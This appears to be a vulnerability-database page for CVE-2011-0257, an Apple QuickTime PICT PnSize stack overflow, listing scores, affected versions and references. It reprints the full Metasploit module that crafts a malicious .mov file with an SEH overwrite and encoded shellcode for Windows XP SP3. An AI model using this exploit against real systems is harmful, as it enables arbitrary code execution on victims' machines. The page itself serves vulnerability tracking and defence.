VIR Vulnerability Intelligence Relay

CVE-2011-0257

critical
Published 2011-08-15 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

Integer signedness error in Apple QuickTime before 7.7 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PnSize opcode in a PICT file that triggers a stack-based buffer overflow.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-17777 local windows verified ruby ยท 2 KB
Metasploit ยท 2011-09-03

Apple QuickTime - PICT PnSize Buffer Overflow (Metasploit)

ruby exploit Source: Exploit-DB 
##
# $Id: apple_quicktime_pnsize.rb 13691 2011-09-03 21:17:58Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apple QuickTime PICT PnSize Buffer Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0.
				When opening a .mov file containing a specially crafted PnSize value, an attacker
				may be able to execute arbitrary code. 
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'MC' ],
			'Version'        => '$Revision: 13691 $',
			'References'     =>
				[
					[ 'CVE', '2011-0257' ],
					[ 'BID', '49144' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'DisablePayloadHandler' => 'true',
				},
			'Payload'        =>
				{
					'Space'    => 750,
					'BadChars' => "",
					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
					'DisableNops'  =>  'True',
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
					'EncoderOptions' =>
						{
							'BufferRegister' => 'ECX',
						},
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows XP SP3', { 'Ret' => 0x672b6d4a } ], # QuickTime.qts 7.60.92.0
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Aug 8 2011',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME',   [ false, 'The file name.',  'msf.mov' ]),
			], self.class)
	end

	def exploit

		trigger = rand_text_alpha_upper(3324)
		trigger[2302, 8]  = generate_seh_record(target.ret)
		trigger[2310, payload.encoded.size] = payload.encoded

		path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" )
		fd = File.open(path, "rb" )
		sploit = fd.read(fd.stat.size)
		fd.close

		sploit << trigger

		file_create(sploit)
	end
end
__END__
http://mirrors.apple2.org.za/apple.cabi.net/Graphics/PICT.and_QT.INFO/PICT.file.format.TI.txt

Opcode   Name                       Description                  Data Size (in bytes)

$0007    PnSize                     pen size (point)             4

Metasploit modules

exploit_windows/fileformat/apple_quicktime_pnsize rank 400
Apple QuickTime PICT PnSize Buffer Overflow
Source fetch failed: fetch_error โ€” view the original via the link above.

Application impact
VendorProductVersionsFixed
macos applequicktime{"endIncluding":"7.6.9"}
macos applequicktime7.0.0
macos applequicktime7.0.1
macos applequicktime7.0.2
macos applequicktime7.0.3
macos applequicktime7.0.4
macos applequicktime7.1.0
macos applequicktime7.1.1
macos applequicktime7.1.2
macos applequicktime7.1.3
macos applequicktime7.1.4
macos applequicktime7.1.5
macos applequicktime7.1.6
macos applequicktime7.2.0
macos applequicktime7.2.1
macos applequicktime7.3.0
macos applequicktime7.3.1
macos applequicktime7.3.1.70
macos applequicktime7.4.0
macos applequicktime7.4.1
macos applequicktime7.4.5
macos applequicktime7.5.0
macos applequicktime7.5.5
macos applequicktime7.6.0
macos applequicktime7.6.1
macos applequicktime7.6.2
macos applequicktime7.6.5
macos applequicktime7.6.6
macos applequicktime7.6.7
macos applequicktime7.6.8
macos applequicktime7.66.71.0
macos applequicktime7.67.75.0

References

CWEs

CWE-189

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.